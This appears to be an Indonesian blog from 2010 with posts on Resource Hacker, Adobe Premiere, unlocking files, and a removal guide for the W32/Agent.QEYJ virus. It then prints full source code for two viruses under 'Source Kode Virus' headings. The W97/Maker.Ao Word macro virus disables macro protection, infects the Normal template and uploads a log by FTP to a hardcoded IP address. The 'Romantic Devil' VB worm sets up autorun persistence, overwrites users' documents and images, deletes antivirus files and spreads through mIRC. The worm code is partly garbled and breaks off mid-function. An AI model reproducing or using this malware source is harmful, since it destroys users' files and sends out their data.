Minggu, 24 Januari 2010

Otak Atik Windows Dengan Resource Hacker

Bagi yang hoby mengotak-atik atau memodifikasi windows, ada sebuah software yang dikenal dengan nama “Resource Hacker”. Pada kesempatan ini saya akan menjelaskan dasar-dasarnya saja.

Apakah Resource Hacker Itu?
Bagi yang belum tau kita baca dulu yuk...tapi bagi yang sudah tau abaikan saja OK!
Resource hacker adalah sebuah software freeware/gratis yang fungsinya untuk mengedit file-file yang tidak dapat di buka oleh program-program biasa, seperti file dengan extensi (.dll, .exe, .cpl dan masih banyak lagi).

Tool ini sangat membantu dalam melakukan modifikasi-modifikasi yang dilakukan pada sistem operasi windows. Misalnya kita ingin mengganti kata “Refresh” menjadi “Segarkan”. Ingin Mencoba ... download aja Resource Hacker disini. Anda tidak perlu menginstallnya cukup double click aja ResHacker.exe dengan icon palu.

Menggunakan Resource Hacker
Sebelum bekerja dengan resource hacker ada beberapa hal yang harus anda ketahui :

  1. Program ini merupakan buatan manusia dan tak akan terlepas dari adanya bug pada program ketika digunakan

  2. Resource Hacker Di compile (dibuat) menggunakan Delphi™ ver 3.02.

  3. Rsource Hacker tidak dapat digunakan untuk membuka aplikasi/executable 16 BIT

  4. Beberapa executable file yang dicompress menggunakan metode tertentu seperti upx atau metode lainnya mungkin tidak akan dapat dibuka atau berjalan dengan bai
    k.

  5. Program ini hanya merubah tampilan saja dan tidak dapat digunakan untuk menambahkan fungsi baru pada sebuah program.


Bila anda membuka file di Resource Hacker, maka akan muncul direktori di sisi kiri panel, seperti:
AVI
Cursor
Bitmap
Icon
Menu
Dialog
String Table
AcceleratorsVersion Info
dan masih banyak lagi......

direktori ini bervariasi dari file ke file. Berikut ini adalah gambaran kecil dari direktori tersebut.

AVI : direktori ini berisi file AVI
Cursor : direktori ini berisi file CursorBitmap : direktori ini berisi bitmap
Icon : direktori ini berisi icon
Menu : direktori ini berisi berbagai menu
Dialog : direktori ini berisi berbagai kotak dialog
String Table : direktori ini berisi berbagai string
Accelerators : direktori ini berisi kunci pintas
Version Info : direktori ini berisi informasi versi dari file

Melihat Resources
Anda dapat melihat resource apapun yang ada dalam file. Cukup mengembangkan direktori dan klik pada nama resource. Sebenarnya setiap resource terdiri dari 3 bagian:

Resource Type: menunjukkan bahwa resource adalah AVI / Bitmap / Menu / Cursor / Icon / String / etc.
Resource Nama: Ini menggambarkan nama resource
Resource Language: bahasa yang digunakan dalam file. Untuk INGGRIS 1033

Mengubah Resouce
Untuk Cursor/Icon/Bitmap


  1. Pilih resource (misalnya Bitmap -> 131 -> 1033)

  2. Klik Action -> Replace Icon/Cursor/Bitmap

  3. Ini akan mebuka jendela baru, klik Open file with new Icon/Cursor/Bitmap tombol.

  4. Pilih resource yang diinginkan di kotak dialog OPEN dan klik pada tombol Open dan kemudian Replace.


Untuk Resource laninnya seperti AVI
Ini Sedikit berbeda


  1. Klik Action -> Replace Other Resource...

  2. Ini akan membuka jendela baru, klik open file with new resource

  3. Pilih file dan klik tombol Open

  4. Untuk memberikan informasi yang diperlukan untuk sumber daya ini, yang saya sebutkan sebelumnya.

  5. Klik tombol Replace




Untuk Menu/String/Dialog
Untuk mengubah String / Menu / Dialog kotak, Pilih resource yang diinginkan, misalnya, String Table -> 4 -> 1033, dan buatlah perubahan kemudian klik tombol Compile Script.
Itu akan mengkompilasi script dan akan memberi tanda ERROR jika terjadi kesalahan sehingga anda bisa memperbaikinya.

Nah begitulah dasar-dasar Resource Hacker, selanjutnya saya akan posting lagi tips dan triknya di lain waktu.

Semoga Bermanfaat

virus W32/Agent.QEYJ

Siapa yang bisa mengembalikan file video yang dihapus ……. gua jadiin

pacar ??

Kalau ada virus yang bisa sampai membuat korbannya berbicara seperti kalimat di atas, tentulah itu virus W32/Agent.QEYJ karena virus ini tanpa ampun


menghancurkan file video di komputer korbannya dengan tuntas.


Bagi Anda yang suka mengkoleksi film/video, mulai sekarang mulailah berhati-hati jika tidak ingin kehilangan data film/video, virus ini masih


cukup “baik” karena ia tidak akan menghapus file lagu dalam format mp3. Jika anda berfikir untuk menggunakan program recovery sebaiknya disurutkan saja

niat tersebut karena dari hasil pengujian yang dilakukan tools tersebut belum dapat mengembalikan file yang sudah di hapus, selidik punya selidik

ternyata virus ini tidak sekedar menghapus tapi lebih dari itu ia akan merubah isi file tersebut, sehingga walaupun software recovery berhasil

mendapatkan file tersebut tetapi file yang anda dapat adalah file yang sudah terinfeksi / diubah oleh virus

Virus ini dibuat dengan menggunakan program bahasa assembly dengan ukuran file induk sekitar 66 KB, untuk mengelabui user ia akan menggunakan icon


”Windows Media Player Classic” dengan type file sebagai “application” Sebenarnya tidak terlalu sulit untuk mengetahui apakah komputer sudah

terinfeksi  virus ini salah satunya dengan munculnya file shortcut dengan ukuran 2KB disetiap drive, selain itu

munculnya file dengan icon ”Windows Media Player Classic” yang di simpan di direktori dimana anda menyimpan file film / video dengan ukuran file sebesar

66 KB atau 575 KB, tetapi file ini akan disembunyikan. (lihat gambar 1 dan 2)



Gambar 1, File induk W32/Agent.QEYJ

 




Gambar 2, File Shortcut virus


Dengan update terbaru Norman Security Suite mendeteksi virus ini sebagai


W32/Agent.QEYJ (lihat gambar 3)



Gambar 3, Hasil deteksi Norman Security Suite

File Induk

Pada saat file tersebut di jalankan oleh user, ia akan membuat beberapa file


induk berikut yang akan dijalankan secara otomatis pada saat komputer

dinyalakan:

C:\Program Files\Windows Media Player

Svchost.exe

Wmplayerc.exe


C:\Documents and Settings\client\My Documents\RÊCYCLÊR.com\RÊCYCLÊR


Autorun.inf (folder)

Registri Windows

Agar file tersebut dapat dijalankan secara otomatis, ia akan membuat

string pada registry berikut

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run


Windows Media Player = C:\Program Files\Windows Media Player\wmplayerc.exe

Selain dengan membuat string pada registri di atas, ia juga akan membuat shortcut  dengan ukuran 2 KB. File


shortcut ini mempunyai nama file yang sama dengan folder yang nantinya akan disembunyikan oleh virus tersebut, icon yang digunakannya pun akan

menyerupai icon folder, hal ini digunakan sebagai upaya untuk mengelabui user apalagi type yang tersebut adalah sebagai “File Folder” sungguh

penyamaran yang sempurna. File shortcut itu sendiri berisi script/link untuk menjalankan sebuah file virus yang berada di direktori “..\RÊCYCLÊR\  .com”

(lihat gambar 4)

 




 


Gambar 4, Link file shortcut yang dibuat oleh W32/Agent.QEYJ

Blok fungsi Windows


Virus ini tidak terlalu banyak melakukan blok terhadap tools / software


security, walaupun demikian ia akan merubah beberapa fungsi Windows seperti Windows Firewall atau Folder Options (tidak bisa menampilkan file yang

tersembunyi) dan beberapa fungsi Windows lainnya dengan membuat beberapa string pada registri berikut



HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system






EnableLUA = 0

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System

DefaultValue = 1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center

AntiVirusDisableNotify = 1

FirewallDisableNotify = 1

UpdatesDisableNotify = 1

AntiVirusOverride = 1

FirewallOverride = 1

UacDisableNotify = 1


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc

AntiVirusDisableNotify = 1



FirewallDisableNotify = 1


UpdatesDisableNotify = 1

AntiVirusOverride = 1

FirewallOverride = 1

UacDisableNotify = 1

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control

WaitToKillServiceTimeout = 1000

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control

WaitToKillServiceTimeout = 1000



HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\PropSummary


Advanced = 0

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Extensions\CmdMapping

NextId = 8193

{92780B25-18CC-41C8-B9BE-3C9C571A8263} =

8193

Babat abis file film / video

Bagi anda yang suka mengkoleksi film dengan berbagai format sebaiknya


berhati-hati karena virus ini akan mengincar sejumlah file yang mempunyai

ekstensi mpeg, avi, dat, atau mov. Virus ini tidak akan menghapus tetapi

lebih parah dari itu ia akan menulis ulang isi file tersebut, file yang

sudah di ubah akan mempunyai ukuran sebesar 66 KB tidak sampai disitu, file

duplikat ini akan di injeksi ulang dengan menambahkan kode virus sehingga

ukuran file virus membengkak menjadi 575 KB. Untuk mengelabui user ia akan

menggunakan rekayasa sosial yang cukup pintar yakni dengan menggunakan icon

“Windows Media Player Classic” dan akan menyembunyikan file tersebut, jika

diperhatikan saat ini jarang virus lokal yang akan menyembunyikan file

duplikat yang telah dibuat dan tetap di infeksi virus tetapi

justru trik ini sangat menarik dan

diluar dugaan karena biasanya user akan beranggapan file yang disembunyikan

oleh virus adalah file asli yang tidak terinfeksi virus.

Recovery file

dengan bantuan software recovery masih tidak mampu menolong banyak, karena

virus ini sudah merubah isi file tersebut maka file yang berhasil di

recovery pun adalah file-file yang sudah terinfeksi virus.

Hal lain yang akan dilakukan adalah akan menyembunyikan folder / sub folder


di setiap drive termasuk media flash disk atau removable disk, untuk

mengelabui user ia akan membuat file shortcut yang akan mempunyai nama file

yang sama dengan folder yang disembunyikan tersebut, file ini mempunyai

ukuran sekitar 2 KB dan berisi link untuk menjalankan file virus yang ada di

direktori  “RÊCYCLÊR\  .com”.

Agar  penyamarannya lebih


sempurna, ia juga akan memanipulasi type file dari file shortcut tersebut

menjadi “File Folder” dengan merubah string pada registry berikut : (lihat

gambar 5)

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile


[Default] = File Folder


 



 


Gambar 5, File duplikat dan file shortcut yang dibuat oleh W32/Agent.QEYJ

Media Penyebaran

Untuk menyebarkan dirinya, ia akan menggunakan media Flash Disk dengan cara


menyembunyikan folder/subfolder yang ditemui dan membuat shortcut yang

mempunyai nama yang sama dengan nama folder yang disembunyikan dengan ukuran

sekitar 2 kb.  File shortcut ini

berisi link untuk menjalankan file virus yang disimpan di direkori

“RÊCYCLÊR\  .com” (lihat gambar 6)




 


Gambar 6, Link shortcut yang dibuat oleh virus

Virus ini tidak akan aktif secara otomatis pada saat user akses ke drive /


flash disk, justru ia akan membuat folder kosong dengan nama “autorun.inf”

disetiap drive yang mempunyai atribut (system, hidden dan read only),

mungkin langkah ini dilakukan sebagai upaya agar virus lain tidak dapat

membuat script autorun virus sehingga virus tersebut tidak dapat aktif

secara otomatis pada saat user akses drive tersebut.

Cara mengatasi Trojan:W32/Agent.QEYJ

  1. Nonaktifkan “System Restore”, selama proses pembersihan

  2. Matikan proses virus yang aktif di memory, anda dapat menggunakan tools“Security Task Manager” dengan mendownload di alamat



    http://www.neuber.com/taskmanager/download.html (lihat gambar 7)





 


Gambar 7, Mematikan proses virus yang aktif di memori

Matikan proses virus yang mempunyai nama “svchost.exe” dan Multimedia Video


File” atau file yang mengarah ke direktori “..\Program Files\Windows Media

Player\”

  1. Fix registry Windows yang sudah diubah oleh virus,untuk mempercepat proses

    perbaikan salin script dibawah ini pada program “notepad” kemudian

    simpan dengan nama “repainr.inf”. Jalankan file tersebut dengan

    cara, klik kanan “repair.inf” |

    klik “install”


[Version]


Signature=”$Chicago$”


Provider=Vaksincom Oyee


[DefaultInstall]


AddReg=UnhookRegKey


DelReg=del


[UnhookRegKey]


 


HKLM, Software\CLASSES\batfile\shell\open\command,,,”"”%1″” %*”


HKLM, Software\CLASSES\comfile\shell\open\command,,,”"”%1″” %*”


HKLM, Software\CLASSES\exefile\shell\open\command,,,”"”%1″” %*”


HKLM, Software\CLASSES\piffile\shell\open\command,,,”"”%1″” %*”


HKLM, Software\CLASSES\regfile\shell\open\command,,,”regedit.exe “%1″”


 


HKLM, Software\CLASSES\scrfile\shell\open\command,,,”"”%1″” %*”


HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0,


“Explorer.exe”

HKLM, SYSTEM\ControlSet001\Control, WaitToKillServiceTimeout,0, “2000″


HKLM, SYSTEM\CurrentControlSet\Control, WaitToKillServiceTimeout,0, “2000″


HKCU, Software\Microsoft\Internet Explorer\Extensions\CmdMapping,NextId,0,


“8194″

 


HKCU, Software\Microsoft\Internet


Explorer\Extensions\CmdMapping,{92780B25-18CC-41C8-B9BE-3C9C571A8263},0,

“8194″

HKLM, SOFTWARE\Classes\lnkfile,,,”Shortcut”


HKLM, SOFTWARE\Microsoft\Security Center,AntiVirusDisableNotify,0×00010001,0


HKLM, SOFTWARE\Microsoft\Security Center,FirewallDisableNotify,0×00010001,0


HKLM, SOFTWARE\Microsoft\Security Center,UpdatesDisableNotify,0×00010001,0


 


HKLM, SOFTWARE\Microsoft\Security Center,AntiVirusOverride,0×00010001,0


HKLM, SOFTWARE\Microsoft\Security Center,FirewallOverride,0×00010001,0


HKLM, SOFTWARE\Microsoft\Security Center,UacDisableNotify,0×00010001,0


 


 


[del]


HKCU, Software\Microsoft\Windows\CurrentVersion\Run, Windows Media Player


HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system, EnableLUA


 


HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,


DefaultValue

HKLM, SOFTWARE\Microsoft\Security Center\Svc


HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\PropSummary


HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32


 


 




  1. Hapus file induk yang dibuat oleh virus dengan terlebih dahulu
    menampilkan file yang disembunyikan terlebih dahulu, caranya : (lihat 

    gambar 8)


 



ü



Buka Windows Explorer




ü



Klik menu “Tools”

Klik menu “View”

Klik “Folder Options”

Klik tabulasi “View”

Centang option “Show hidden files and folders”

Hilangkan tanda centang pada opsi “Hide extensions for known files types”


Hilangkan tanda centang pada opsi “Hide protected operating system


files (Recommended)”

Klik “OK”


 


Gambar 8, Setting Folder Optoins untuk menampilkan file yang disembunyikan



Kemudian hapus file berikut:

C:\Program Files\Windows Media Player

Svchost.exe

Wmplayerc.exe

C:\Documents and Settings\client\My Documents\RÊCYCLÊR

RÊCYCLÊR

(hapus di setia drive termasuk Flash Disk)

Hapus file shortcut  yang dibuat

oleh virus yang berada di disetiap drive termasuk flash disk

dengan ciri-ciri : (lihat gambar

9)



    1. Ukuran 2 KB (file shortcut)

    2. Icon “Folder” (file shortcut)







 


Gambar 9, Contoh file shortcut yang dibuat oleh virus


 




  1. Hapus juga file duplikat yang dibuat oleh virus dengan ciri-ciri

    1. Ukuran 66 KB dan 575 KB

    2. Icon “Windows Media Player Classic”

    3. Type file “Application”




 


Lokasi file ini acak tergantung dimana anda menyimpan file film/video,


karena file duplikat ini akan dibuat di direktori yang sama dengan

penyimpanan file film/video tersebut. Oleh karena itu untuk mempercepat

proses pencarian dan penghapusan sebaiknya anda gunakan fungsi “Search

Windows”, seperti terlihat pada gambar di bawah ini : (lihat gambar 10)

 





 


Gambar 10, Mencari dan menghapus file duplikat virus

 




  1. Tampilkan folder/subfolder yang disemunyikan,dengan cara : (lihat gambar
    11)




Klik menu “start”


Klik “Run”


Ketik CMD, kemudian klik tombol “OK”


Pindahkan posisi kursor ke lokasi drive yang akan di cek, kemudian ketik

perintah

ATTRIB

–S  –H

–R

/S  /D

 


 




 


Gambar 11, Menampilkan folder/sub folder yang disembunyikan


 




  1. Untuk pembersihan optimal dan mencegah infeksi ulang install dan scandengan menggunakan antivirus  yang

    up-to-date. Anda juga dapat mendwnload Norman Malware Cleaner di alamat

    berikut:


 






http://www.norman.com/support/support_tools/58732/en

Sabtu, 09 Januari 2010

Edit Video Dengan Adobe Premiere

Adobe Premiere Pro dibuat oleh Adobe System Inc, yang merupakan versi pembaharuan dari beberapa versi Adobe Premiere terdahulu. Adobe Premiere Pro mulai di luncurkan ke pasaran pada bulan Agustus tahun 2003. Mulai versi 6.0 Adobe Premiere dapat digunakan untuk mengedit file video dengan format DV. Adobe Premiere telah menjadi program standar bagi para profesional dalam bidang digital video.

A. Fitur Baru Adobe Premiere Pro

Pada versi baru ini Adobe Premiere Pro hadir dengan tampilan baru, tetapi lebih simple dari para pendahulunya. Penamaan efek video serta transisinya sedikit mengalami perubahan sehingga membutuhkan waktu bagi para pengguna versi lama (6.0 dan 6.5) untuk menyesuaikan diri dalam tampilan yang baru ini. Beberapa fasilitas baru yang ada dalam Adobe Premiere Pro adalah :

  • Real  Time  Rendering


Dengan  fasilitas  ini  memungkinkan  melihat  hasil  transisi  tanpa  melalui proses render.

  • Adobe  Product  Integration


Yaitu  kita  dapat  menggunakan  berbagai  produk  Adobe  (Adobe Photoshop,  Adobe  After  Effects,  Adobe  Encore  DVD  dan  Adobe Audition)  untuk  bekerja sama dengan Adobe Premiere Pro.

  • Audio  Mixer


Pada versi ini Adobe telah memperbarui fasilitas audio mixernya, yang mendukung track-based effects, submix tracks, mendukung proses perekaman voiceover langsung (dubbing), fasilitas panning untuk surround dan stereo dan VST filter.

  • Color Correction


Adobe Premiere Pro mulai versi ini melengkapi dirinya dengan fasilitas eksklusif ini.  Fasilitas  ini  biasanya  terdapat  pada  software  editing  standar broadcast  (high-end).  Dengan adanya  fasilitas  ini  kita  dapat  dengan mudah  mengkoreksi  warna  clip  video  kita  sesuai  dengan keinginan.

  • Motion Path


Pada versi yang baru ini Adobe PremierePro menerapkan prinsip keyframing untuk animasi perpindahan posisi pada klip-klip nya.

  • Visual Effect yang dilengkapi dengan keyframe


Sehingga dapat dianimasikan dengan mudah.

  • Fasilitas export dalam berbagai format


Adobe Premiere Pro menyediakan fasilitas ekspor kedalam berbagai format media seperti MPEG-1, MPEG-2, Microsoft DV, AVI dalam berbagai kompresi, Windows Media 9 Series dan Real Media 9.

 

B. Kebutuhan Komputer untuk Menjalankan Adobe Premiere Pro

PC (Personal Computer) digunakan untuk mengolah file video baik proses capture maupun editing menggunakan software Adobe Premiere Pro. PC yang akan digunakan minimal harus memiliki spesifikasi sebagai berikut :

  • Processor Intel® Pentium® III – 800 Mhz

  • RAM 256 Mb

  • Harddiskberkecepatan 7200 rpm dengan kapasitas besar (space kosong minimal 20 Gb)

  • VGA Card 32 Mb (resolusi monitor 1024x768 pixel)

  • Sound Card yang mendukung DirectX

  • CD-ROM/RW dan DVD-ROM/RW untuk menulis dalam format VCD maupun DVD

  • DV Capture Card/IEEE 1394 Card

  • Sistem Operasi Windows XP Home/Pro Edition


Untuk menggunakan Adobe Premiere Pro maka harus menggunakan Microsoft Windows XP sebagai sistem operasinya. Hal ini dikarenakan Adobe Premiere Pro hanya dapat berjalan pada sistem operasi tersebut. Lain dengan Adobe Premiere versi 6.5 yang masih dapat berjalan pada sistem operasi Windows 98SE dan Windows 2000.

Jumat, 08 Januari 2010

Hapus File atau Folder yang Terkunci

error biasanya muncul akibat file ato folder tersebut di locked oleh program lain. dalam hal ini file ato folder yang di block tidak dapat di akses seperti di baca atopun di eksekusi,  dan juga gak bisa di copy atopun di delete.

kemungkinan error ini terjadi karena :

  • Cannot delete file: Access is denied.

  • There has been a sharing violation.

  • The source or destination file may be in use.

  • The file is in use by another program or user.

  • Make sure the disk is not full or write-protected and that the file is not currently in use


salah satu cara untuk mngatasinya dengan reboot windows untuk menghentikan semua proses, tapi jika file ato folder ini di block oleh virus, walopun di rebootpun percuma.. gak ngefek… atuut so kita bisa minta bantuan sopwer utility, salah satunya Unlocker. ada versi bahasa indonesianya coy.. ting

Aplikasinya mudah kok digunakan, tinggal klik doang… gini neh caranya :

  1. klik kanan file ato folder trus pilih unlocker

  2. jika file to folder locked/terkunci, maka akan muncul list lockers di window

  3. klik unlock.. dah.. selesai

Source Kode Virus W97/Maker.Ao

W97/Maker.Ao

Private Sub Document_Close()

On Error Resume Next

Const Marker = "<- this is a marker!"

'Declare Variables

Dim SaveDocument, SaveNormalTemplate, _

DocumentInfected, NormalTemplateInfected As Boolean

Dim ad, nt As Object

Dim OurCode, UserAddress, LogData, LogFile As String

'Initialize Variables

Set ad = ActiveDocument.VBProject.VBComponents.Item(1)

Set nt = NormalTemplate.VBProject.VBComponents.Item(1)

DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)

NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)

'Switch the VirusProtection OFF

Options.VirusProtection = False

If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then

If DocumentInfected = True Then

LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)

ElseIf NormalTemplateInfected = True Then

LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)

End If

LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))

For I = 1 To 4

LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)

Next I

LogFile = "C:\hsf" & LogFile & ".sys"

Open LogFile For Output As #1

Print #1, LogData

Close #1

Open "c:\netldx.vxd" For Output As #1

Print #1, "o 209.201.88.110"

Print #1, "user anonymous"

Print #1, "pass itsme@"

Print #1, "cd incoming"

Print #1, "ascii"

Print #1, "put " & LogFile

Print #1, "quit"

Close #1

Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True

End If

'Make sure that some conditions are true before we continue infecting anything

If (DocumentInfected = True Xor NormalTemplateInfected = True) And _

(ActiveDocument.SaveFormat = wdFormatDocument Or _

ActiveDocument.SaveFormat = wdFormatTemplate) Then

'Infect the NormalTemplate

If DocumentInfected = True Then

SaveNormalTemplate = NormalTemplate.Saved

OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)

'Write a log file of this NormalTemplate infection

For I = 1 To Len(Application.UserAddress)

If Mid(Application.UserAddress, I, 1) <> Chr(13) Then

If Mid(Application.UserAddress, I, 1) <> Chr(10) Then

UserAddress = UserAddress & Mid(Application.UserAddress, I, 1)

End If

Else

UserAddress = UserAddress & Chr(13) & "' "

End If

Next I

OurCode = OurCode & Chr(13) & _

"' " & Format(Time, "hh:mm:ss AMPM - ") & _

Format(Date, "dddd, d mmm yyyy") & Chr(13) & _

"' " & Application.UserName & Chr(13) & _

"' " & UserAddress & Chr(13)

nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines

nt.CodeModule.AddFromString OurCode

If SaveNormalTemplate = True Then NormalTemplate.Save

End If

'Infect the ActiveDocument

If NormalTemplateInfected = True And _

(Mid(ActiveDocument.FullName, 2, 1) = ":" Or _

ActiveDocument.Saved = False) Then

SaveDocument = ActiveDocument.Saved

OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)

ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines

ad.CodeModule.AddFromString OurCode

If SaveDocument = True Then ActiveDocument.Save

End If

End If

End Sub

Kamis, 07 Januari 2010

Source Kode Virus Romantic Devil

 

Rem Program Virus RomanticDevil.ß
Rem Create By : August
Public lihat_reg As Integer

Sub Main()
Dim Master As String
Dim Lokasi As String
Dim A, B, ngawur As Integer
Randomize
On Error Resume Next
False
Set Obj = CreateObject("scripting.filesystemobject")
Set Krjkn = CreateObject("WScript.Shell")
Lokasi = App.path & "\"
Master = App.EXEName
Master = Lokasi & Master & ".exe"
Krjkn.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mixer", Obj.GetSpecialFolder(0) & "\SysRoot32.dll.exe"
Krjkn.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Mixer", Obj.GetSpecialFolder(0) & "\SysRoot32.dll.exe"
lihat_reg = Krjkn.regRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{7B7DF450-F119-11CD-84465-00CA00425E90}")
Obj.copyfile Master, Obj.GetSpecialFolder(0) & "\SysRoot32.dll.exe"
Obj.copyfile Master, "A:\Creadit Card.txt.exe"
&"\SysRoot32.dll.exe", vbHidden
If lihat_reg = "" Or lihat_reg <> 15 Then
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{7B7DF450-F119-11CD-84465-00CA00425E90}", lihat_reg + 1
End If
If lihat_reg >= 1 Then
"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
End If
If lihat_reg = 2 Then
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "00000000", "REG_DWORD"
End If
If lihat_reg = 3 Then
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", "67108863", "REG_DWORD"
End If
If lihat_reg >= 4 Then

End If
If lihat_reg = 5 Then
"HKCU\Control Panel\Desktop\WindowMetrics\Shell Icon Size", "132"
End If
If lihat_reg > 15 And lihat_reg < 31 Then
Gelap
pesan = "hanya test saja kok "
"RomanticDevil." & Chr(223)
ElseIf lihat_reg > 22 Then
pesan = "By:dr.Pluto"
MsgBox pesan, vbCritical + vbApplicationModal, "RomanticDevil." & Chr(223)
"Shutdown.exe -r"
End If
If lihat_reg = 6 Then
pesan = " RomanticDevil.B "
MsgBox pesan, vbExclamation + vbApplicationModal, "RomanticDevil.Beta"
End If

Call W23W58
Call Send_Outlook
End Sub


Sub W23W58()
On Error Resume Next
Set Obj = CreateObject("scripting.filesystemobject")
Set W84C10 = Obj.Drives
For Each W42Q62 In W84C10
If W42Q62.Drivetype = Remote Then
W20I84 = W42Q62 & "\"
Call Infect(W20I84)
ElseIf W42Q62.IsReady Then
W20I84 = W42Q62 & "\"
Call Infect(W20I84)
End If
Next
End Sub


Sub Infect(X94E78)
On Error Resume Next
Set Obj = CreateObject("scripting.filesystemobject")
Lokasi = App.path & "\"
Master = App.EXEName
Set X85W4 = Obj.GetFolder(X94E78)
Set X59Q23 = X85W4.Files
For Each X39I89 In X59Q23
Ext_file = Obj.GetExtensionName(X39I89.path)

If Ext_file = "htm" Or Ext_file = "html" Or Ext_file = "php" Then
Set C = Obj.CreateTextFile(X39I89.path, True)
C.WriteLine "</html><head><title>RomanticDevil</title><meta http-equiv=""Content-Type"" content=""text/html; charset=iso-8859-1""></head> <body bgcolor=""#000000"" link=""#006600""> <p align=""right""> <font color=""#00FF00"" size=""6"" face=""Script""> <div align=""right""><font color=""#00FF00"" size=""6"" face=""Script""> A Woman 's heart is a deep ocean of secrets.</font></div><p align=""left""><font color=""#00FF00"" size=""6"" face=""Script"">But now you all know there was a man </font><font color=""#00FF00"" size=""6"" face=""Script"">named jack Dawson, and that he saved me,</font><font color=""#00FF00"" size=""6"" face=""Script"">in every way that a person can be saved.</font><p align=""right""><a href=""mailto:RomanticDevil@yahoo.com""><font size=""6"">Rose Dewitt Bukater</font></a></body></html>"
C.Close
End If
If Ext_file = "xls" Or Ext_file = "doc" Or Ext_file = "jpg" Or Ext_file = "gif" Or Ext_file = "mp3" Then
Set C = Obj.CreateTextFile(X39I89.path, True)
C.WriteLine vbCrLf & vbCrLf & " RomanticDevil." & Chr(223) & vbCrLf & "" & vbCrLf & " A Woman 's heart is a deep ocean of secrets" & vbCrLf & " But now you all know there was a man" & vbCrLf & " named jack Dawson, and that he saved me," & vbCrLf & " in every way that a person can be saved." & vbCrLf & "" & vbCrLf & " Rose Dewitt Bukater"
C.Close
End If
If Ext_file = "txt" Then
Obj.copyfile Obj.GetSpecialFolder(0) & "\SysRoot32.dll.exe", X39I89.path & ".exe", True
SetAttr X39I89.path & ".exe", vbNormal
Kill X39I89.path
End If
' fungsi menghapus anti 2 Virus
If X39I89.Name = "ALUNOTIFY.EXE" Or X39I89.Name = "mcdash.exe" Or X39I89.Name = "mcagent.exe" Then
Kill X39I89.path
End If
If X39I89.Name = Chr(109) & Chr(105) & Chr(114) & Chr(99) & ".ini" Or X39I89.Name = Chr(109) & Chr(105) & Chr(114) & Chr(99) & ".exe" Then
Fungsi_mIRC (X39I89.ParentFolder)
End If
If X39I89.Name = "Pirch32.exe" Then
Fungsi_Pirch (X39I89.ParentFolder)
End If
If lihat_reg > 15 Then
If Ext_file = "exe" Or Ext_file = "com" Then
Obj.copyfile Obj.GetSpecialFolder(0) & "\SysRoot32.dll.exe", X39I89.path, True
SetAttr X39I89.path, vbNormal
End If
End If
Next
Set X39I89 = X85W4.SubFolders
For Each X19I36 In X39I89
Call Infect(X19I36.path)
Next
End Sub

Function Fungsi_mIRC(path)
On Error Resume Next
Set Obj = CreateObject("scripting.filesystemobject")
Set Krjkn = CreateObject("WScript.Shell")
baca = "½µÅÔËÒÖ¿olÐ’ŸÑЂ“œ¬±«°œ…œÝolГŸ‚‚‘ËÈ‚Š‚†ÐËÅÍ‚ŸŸ‚†ÏÇ‚‹‚Ý‚ÊÃÎÖ‚ßolДŸ‚‚‘ÆÅÅ‚ÕÇÐÆ‚†ÐËÅÍ‚¥œ¾¹«°¦±¹µ¾µÛÕ´ÑÑÖ•”ÆÎΐÇÚÇolЕŸß"
If path = "" Then
If Obj.fileexists("" & Chr(67) & ":\" & Chr(109) & Chr(105) & "rc\" & Chr(109) & Chr(105) & "rc.ini") Then path = "" & Chr(67) & ":\" & Chr(109) & Chr(105) & "rc"
If Obj.fileexists("" & Chr(67) & ":\" & Chr(109) & Chr(105) & "rc32\" & Chr(109) & Chr(105) & "rc.ini") Then path = "" & Chr(67) & ":\mirc32"
P69R22 = Krjkn.regRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If Obj.fileexists(P69R22 & "\" & Chr(109) & Chr(105) & "rc\" & Chr(109) & Chr(105) & "rc.ini") Then path = P69R22 & "\" & Chr(109) & Chr(105) & "rc"
End If
If path <> "" Then
